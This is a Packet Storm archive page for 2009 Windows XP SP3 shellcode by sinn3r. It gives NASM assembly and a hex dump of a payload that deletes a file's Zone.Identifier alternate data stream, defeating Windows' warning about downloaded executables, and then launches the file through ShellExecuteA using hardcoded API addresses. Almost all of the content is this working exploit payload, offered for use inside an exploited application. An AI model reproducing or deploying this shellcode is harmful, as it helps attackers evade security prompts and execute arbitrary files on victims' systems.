what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Zone.Identifier ADS Shellcode Bypass

Zone.Identifier ADS Shellcode Bypass
Posted Dec 21, 2009
Authored by sinn3r

This shellcode will attempt to delete the Zone.Identifier ADS and then runs the file using the ShellExecuteA function.

tags | shellcode
SHA-256 | 7c5c86d8a1260728dd1fb1099f979199962e2487372f6851fa49aa70d4606fca

Zone.Identifier ADS Shellcode Bypass

Change Mirror Download
; Author: sinn3r
; Tested on Windows XP SP3
; Description:
; This shellcode will attempt to delete the Zone.Identifier ADS (it's a
; trick Microsoft uses to warn you about an exe when you try to run it),
; and then run the file using the ShellExecuteA function.
; Make sure the exploited app has the following components loaded
; (should be pretty common):
; KERNEL32, msvcrt, SHELL32

[BITS 32]

global _start

_start:

push 0x00657865
push 0x2e747365
push 0x745c3a43
xor edi, edi
mov edi, esp ; edi = "C:\test.exe"

xor esi, esi
push 0x00004154
push 0x4144243a
push 0x72656966
push 0x69746e65
push 0x64492e65
push 0x6e6f5a3a
mov esi, esp ; edi = fork

push esi
push edi
xor eax, eax
mov eax, 0x77C46040 ; msvcrt.strcat (Windows XP SP3)
call eax

xor eax, eax
mov eax, 0x7c831ec5 ; KERNEL32.DeleteFileA (Windows XP SP3)
call eax

xor edx, edx
mov word [edi + 11], dx

push edx
push 0x6e65706f
mov edx, esp ; edx = "open"
xor eax, eax
push eax ; IsShown = NULL
push eax ; DefDir = NULL
push eax ; Parameters = NULL
push edi ; Filename
push edx ; Operation = "open"
push eax ; hwnd = NULL
mov eax, 0x7ca41150 ; SHELL32.ShellExecuteA (Windows XP SP3)
call eax

; shellcode:
; sinn3r@backtrack:~$ nasm -f bin shellexecute.asm -o shellexecute | cat shellexecute |hexdump -C |grep -v 00000066
; 00000000 68 65 78 65 00 68 65 73 74 2e 68 43 3a 5c 74 31 |hexe.hest.hC:\t1|
; 00000010 ff 89 e7 31 f6 68 54 41 00 00 68 3a 24 44 41 68 |...1.hTA..h:$DAh|
; 00000020 66 69 65 72 68 65 6e 74 69 68 65 2e 49 64 68 3a |fierhentihe.Idh:|
; 00000030 5a 6f 6e 89 e6 56 57 31 c0 b8 40 60 c4 77 ff d0 |Zon..VW1..@`.w..|
; 00000040 31 c0 b8 c5 1e 83 7c ff d0 31 d2 66 89 57 0b 52 |1.....|..1.f.W.R|
; 00000050 68 6f 70 65 6e 89 e2 31 c0 50 50 50 57 52 50 b8 |hopen..1.PPPWRP.|
; 00000060 50 11 a4 7c ff d0 |P..|..|

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close